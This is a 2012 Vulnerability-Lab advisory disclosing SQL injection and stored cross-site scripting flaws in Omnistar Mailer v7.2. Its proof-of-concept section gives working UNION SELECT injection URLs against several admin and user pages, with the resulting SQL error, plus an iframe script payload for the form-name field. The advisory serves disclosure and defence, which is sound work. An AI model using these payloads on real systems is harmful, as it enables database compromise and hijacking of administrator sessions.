224 lines
9.1 KiB
Text
Executable file
224 lines
9.1 KiB
Text
Executable file
Title:
|
|
======
|
|
Omnistar Mailer v7.2 - Multiple Web Vulnerabilities
|
|
|
|
|
|
Date:
|
|
=====
|
|
2012-10-01
|
|
|
|
|
|
References:
|
|
===========
|
|
http://www.vulnerability-lab.com/get_content.php?id=711
|
|
|
|
|
|
VL-ID:
|
|
=====
|
|
711
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
8.5
|
|
|
|
|
|
Introduction:
|
|
=============
|
|
The Omnistar Mailer software was developed because of the need that was found in the industry to easily manage
|
|
email marketing campaigns without having much technical experience. After reviewing feedback from various users
|
|
that had used email mailing list managers, it was determined that many of the current solutions that are on the
|
|
market are cumbersome and overly complex. Most users of email marketing solutions desire a simple solution were
|
|
they can easily add email list campaigns and track the success of them. There of course are many other features
|
|
that add value to the products, however the main function is to send out mass emails, manage the opt-in /
|
|
opt-out process. After reviewing the feedback of these users and studying the current solutions on the market,
|
|
we developed what we call Omnistar Mailer. We feel our product combines simplicity with a robust set of features
|
|
and functions that should meet the needs of most users.
|
|
|
|
The Omnistar Mailer software is one of the flag ship solutions from Omnistar Interactive. Our entire goal when
|
|
developing any of our solutions has been to make it so easy to use, that any non-technical person can successfully
|
|
use the software. Everyday we strive to make more and more improvements to the software so that it becomes better
|
|
and better. To make this goal a reality, we actively solicit feedback from our customers so that we stay on the
|
|
pulse of their needs. It is only through this interactive dialogue that we can implement those features that make
|
|
sense to our customers. It is our customers that drive our development process and make sure that our software has
|
|
the most desired components and features.
|
|
|
|
(Copy of the Vendor Homepage: http://www.omnistarmailer.com/company.htm )
|
|
|
|
|
|
Abstract:
|
|
=========
|
|
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Omnistar Mailer v7.2 Email Marketing Software.
|
|
|
|
|
|
Report-Timeline:
|
|
================
|
|
2012-10-01: Public or Non-Public Disclosure
|
|
|
|
|
|
Status:
|
|
========
|
|
Published
|
|
|
|
|
|
Affected Products:
|
|
==================
|
|
Omnistar Interactive
|
|
Product: Omnistar Mailer v7.2
|
|
|
|
|
|
Exploitation-Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity:
|
|
=========
|
|
Critical
|
|
|
|
|
|
Details:
|
|
========
|
|
1.1
|
|
Multiple SQL Injection vulnerabilities are detected in the Omnistar Mailer v7.2 Email Marketing Software.
|
|
The vulnerabilities allow an attacker (remote) or local low privileged user account to execute a SQL commands on the
|
|
affected application dbms. The vulnerabilities are located in the responder, preview, pages, navlinks, contacts,
|
|
register and index modules with the bound vulnerable id & form_id parameters. Successful exploitation of the vulnerability
|
|
results in dbms & application compromise. Exploitation requires no user inter action & without privileged user account.
|
|
|
|
|
|
Vulnerable Module(s):
|
|
[+] /admin/responder
|
|
[+] /admin/preview
|
|
[+] /admin/navlinks
|
|
[+] /admin/pages
|
|
[+] /admin/contacts
|
|
[+] /users/index
|
|
[+] /users/register
|
|
|
|
Vulnerable File(s):
|
|
[+] /admin/responder.php
|
|
[+] /admin/preview.php
|
|
[+] /admin/pages.php
|
|
[+] /admin/navlinks.php
|
|
[+] /admin/contacts.php
|
|
[+] /user/register.php
|
|
[+] /users/index.php
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] ?op=edit&id=
|
|
[+] ?id=
|
|
[+] ?form_id=
|
|
[+] ?op=edit&nav_id=
|
|
[+] ?op=edit&id=16&form_id=
|
|
[+] ?op=edit&id=3&form_id=
|
|
|
|
[+] ?nav_id=
|
|
[+] ?profile=1&form_id=
|
|
[+] ?form_id=
|
|
|
|
|
|
1.2
|
|
A persistent input validation vulnerability is detected in the Omnistar Mailer v7.2 Email Marketing Software.
|
|
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
|
|
The persistent vulnerability is located in the Create Website Forms module with the bound vulnerable form name parameters.
|
|
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
|
|
Exploitation requires low user inter action & privileged user account.
|
|
|
|
Vulnerable Section(s):
|
|
[+] Customise Interface -> Create Website Forms
|
|
|
|
Vulnerable Module(s):
|
|
[+] Create Standard Registration Form -> Add form
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] Form Name
|
|
|
|
|
|
Proof of Concept:
|
|
=================
|
|
1.1
|
|
The SQL injection vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ...
|
|
|
|
PoC:
|
|
http://127.0.0.1:1337/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#
|
|
http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20-
|
|
http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list
|
|
http://127.0.0.1:1337/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#
|
|
|
|
http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
|
|
http://127.0.0.1:1337/mailertest/admin/pages.php?op=edit&id=16&form_id=2'
|
|
http://127.0.0.1:1337/mailertest/admin/contacts.php?op=edit&id=3&form_id=2'
|
|
http://127.0.0.1:1337/mailertest/users/index.php?profile=1&form_id=2'
|
|
http://127.0.0.1:1337/mailertest/users/register.php?form_id=2'
|
|
|
|
--- SQL Exception ---
|
|
SQL error (You have an error in your SQL syntax;
|
|
check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 3)
|
|
in (
|
|
select navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward
|
|
from mailer75_navlinks
|
|
where nav_id='9''
|
|
)
|
|
|
|
|
|
|
|
1.2
|
|
The persistent input validation vulnerability can be exploited by remote attackers with low required user inter action & low
|
|
privileged user account. For demonstration or reproduce ...
|
|
|
|
The attacker create a form and insert in "form name" field own malicious javascript or html code.
|
|
To create the form the attacker should to go to
|
|
Customise Interface -> Create Website Forms -> Create Standard Registration Form -> Add form
|
|
Then inject the malicious script code i.e., <iframe src=www.vuln-lab.com onload=alert("VL")/>
|
|
When the user browses the forms page in the control panel, or any user trying to register for the website,
|
|
the persistent injected script code will be executed out of the web application context.
|
|
|
|
|
|
Risk:
|
|
=====
|
|
1.1
|
|
The security risk of the blind SQL injection vulnerability is estimated as critical.
|
|
|
|
1.2
|
|
The security risk of the persistent input validation vulnerability is estimated as medium(+).
|
|
|
|
|
|
|
|
Credits:
|
|
========
|
|
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [storm@vulnerability-lab.com] [iel-sayed.blogspot.com]
|
|
|
|
|
|
Disclaimer:
|
|
===========
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
|
or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
|
|
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
|
|
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
|
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
|
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright ? 2012 | Vulnerability Laboratory
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY RESEARCH LABORATORY
|
|
LABORATORY RESEARCH TEAM
|
|
CONTACT: research@vulnerability-lab.com
|
|
|
|
|